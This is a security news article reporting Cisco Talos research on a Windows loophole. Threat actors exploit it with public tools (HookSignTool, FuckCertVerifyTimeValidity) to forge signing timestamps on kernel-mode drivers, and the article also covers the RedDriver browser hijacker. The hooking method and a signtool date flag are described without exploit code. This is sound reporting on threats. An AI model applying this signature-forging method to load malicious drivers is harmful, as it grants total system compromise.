Last week, **Google** patched three actively exploited Android zero-days.

**MOVEit** has fixed 3 new vulnerabilities in the Transfer software.

**Mozilla** has released a security update to address a vulnerability in Firefox and Firefox ESR.

**SAP** has released its July 2023 Patch Day updates.

**VMware** released VMware SD-WAN updates to fix a vulnerability.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! Microsoft patches a whopping 130 vulnerabilities

A Microsoft Windows policy loophole has been observed being exploited primarily by native Chinese-speaking threat actors to forge signatures on kernel-mode drivers.
"Actors are leveraging multiple open-source tools that alter the signing date of kernel mode drivers to load malicious and unverified drivers signed with expired certificates," Cisco Talos said in an exhaustive two-part report shared

A Microsoft Windows policy loophole has been observed being exploited primarily by native Chinese-speaking threat actors to forge signatures on kernel-mode drivers.

"Actors are leveraging multiple open-source tools that alter the signing date of kernel mode drivers to load malicious and unverified drivers signed with expired certificates," Cisco Talos said in an exhaustive two-part report shared with The Hacker News. "This is a major threat, as access to the kernel provides complete access to a system, and therefore total compromise."

Following responsible disclosure, Microsoft said it has taken steps to block all certificates to mitigate the threat. It further stated that its investigation found "the activity was limited to the abuse of several developer program accounts and that no Microsoft account compromise has been identified."

The tech giant, besides suspending developer program accounts involved in the incident, emphasized that the threat actors had already gained administrative privileges on compromised systems prior to use of the drivers.

It's worth pointing out that the Windows maker had rolled out similar blocking protections in December 2022 to prevent ransomware attackers from using Microsoft-signed drivers for post-exploitation activity.

Driver signature enforcement, which requires kernel-mode drivers to be digitally signed with a certificate from Microsoft's Dev Portal, is a crucial line of defense against malicious drivers, which could be potentially weaponized to evade security solutions, tamper with system processes, and maintain persistence.

The new weakness discovered by Cisco Talos makes it possible to forge signatures on kernel-mode drivers, thereby allowing Windows certificate policies to be bypassed.

This is made possible due to an exception carved out by Microsoft to maintain compatibility, which permits cross-signed drivers if they were "signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed \[certificate authority\]."

"The third exception creates a loophole that allows a newly compiled driver to be signed with non-revoked certificates issued prior to or expired before July 29, 2015, provided that the certificate chains to a supported cross-signed certificate authority," the cybersecurity company said.

As a result, a driver signed in this manner will not be prevented from being loaded on a Windows device, thereby enabling threat actors to take advantage of the escape clause to deploy thousands of malicious, signed drivers without submitting them to Microsoft for verification.

These rogue drivers are deployed using signature timestamp forging software such as HookSignTool and FuckCertVerifyTimeValidity, which have been publicly available since 2019 and 2018, respectively.

HookSignTool has been accessible via GitHub since January 7, 2020, while FuckCertVerifyTimeValidity was first committed to the code hosting service on December 14, 2018.

"HookSignTool is a driver signature forging tool that alters the signing date of a driver during the signing process through a combination of hooking into the Windows API and manually altering the import table of a legitimate code signing tool," Cisco Talos explained.

Specifically, it involves hooking to the CertVerifyTimeValidity function, which verifies the time validity of a certificate, to change the signing timestamp during execution.

"This tiny project prevents the signtool from verifing \[sic\] cert time validity and let you sign your bin with outdated cert without changing system time manually," the GitHub page for FuckCertVerifyTimeValidity reads.

UPCOMING WEBINAR

🔐 PAM Security – Expert Solutions to Secure Your Sensitive Accounts

This expert-led webinar will equip you with the knowledge and strategies you need to transform your privileged access security strategy.

Reserve Your Spot

"It install hook into crypt32!CertVerifyTimeValidity and make it always return 0 and make kernel32!GetLocalTime return what you want as you can add "-fuckyear 2011" to signtool's command line to sign a cert from year 2011."

That said, pulling off a successful forgery requires a non-revoked code signing certificate that was issued before July 29, 2015, along with the certificate's private key and passphrase.

Cisco Talos said it discovered over a dozen code signing certificates with keys and passwords contained in a PFX file hosted on GitHub in a forked repository of FuckCertVerifyTimeValidity. It's not immediately clear how these certificates were obtained.

What's more, it has been observed that HookSignTool has been used to re-sign cracked drivers in order to bypass digital rights management (DRM) integrity checks, with an actor named "Juno\_Jr" releasing a cracked version of PrimoCache, a legitimate software caching solution, in a Chinese software cracking forum on November 9, 2022.

"In the cracked version \[...\], the patched driver was re-signed with a certificate originally issued to 'Shenzhen Luyoudashi Technology Co., Ltd.,' which is contained in the PFX file on GitHub," Talos researchers said. "This ability to resign a cracked driver removes a significant roadblock when attempting to bypass DRM checks in a signed driver."

That's not all. HookSignTool is also being utilized by a previously undocumented driver identified as RedDriver to forge its signature timestamp. Active since at least 2021, it functions as a driver-based browser hijacker that leverages the Windows Filtering Platform (WFP) to intercept browser traffic and reroute it to localhost (127.0.0.1).

The target browser is chosen at random from a hard-coded list containing the process names of many popular Chinese language browsers like Liebao, QQ Browser, Sogou, and UC Browser, as well as Google Chrome, Microsoft Edge, and Mozilla Firefox.

"I initially found RedDriver while researching certificate timestamp forging on Windows drivers," Chris Neal, outreach researcher for Cisco Talos told The Hacker News. "It was one of the first samples I ran into that was immediately suspicious. What caught my attention was the list of web browsers stored inside the RedDriver file."

The ultimate objective of this browser traffic redirection is not clear, although it goes without saying that such a capability could be abused to tamper with browser traffic at the packet level.

RedDriver infection chains commence with the execution of a binary named "DnfClientShell32.exe," which, in turn, initiates encrypted communications with a command-and-control (C2) server to download the malicious driver.

"We didn't observe the delivery of the initial file, but it's very likely that the file was packaged to masquerade as a game file, and was hosted on a malicious download link," Neal said. "The victim probably thought they were downloading a file from a legitimate source and ran the executable. 'DNFClient' is the name of a file belonging to 'Dungeon Fighter Online' which is an extremely popular game in China and commonly referred to as 'DNF.'"

"RedDriver was likely developed by highly skilled threat actors as the learning curve for developing malicious drivers is steep," Cisco Talos said. "While the threat appears to target native Chinese speakers, the authors are likely Chinese speakers as well."

"The authors also demonstrated a familiarity or experience with software development lifecycles, another skill set that requires previous development experience."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#firefox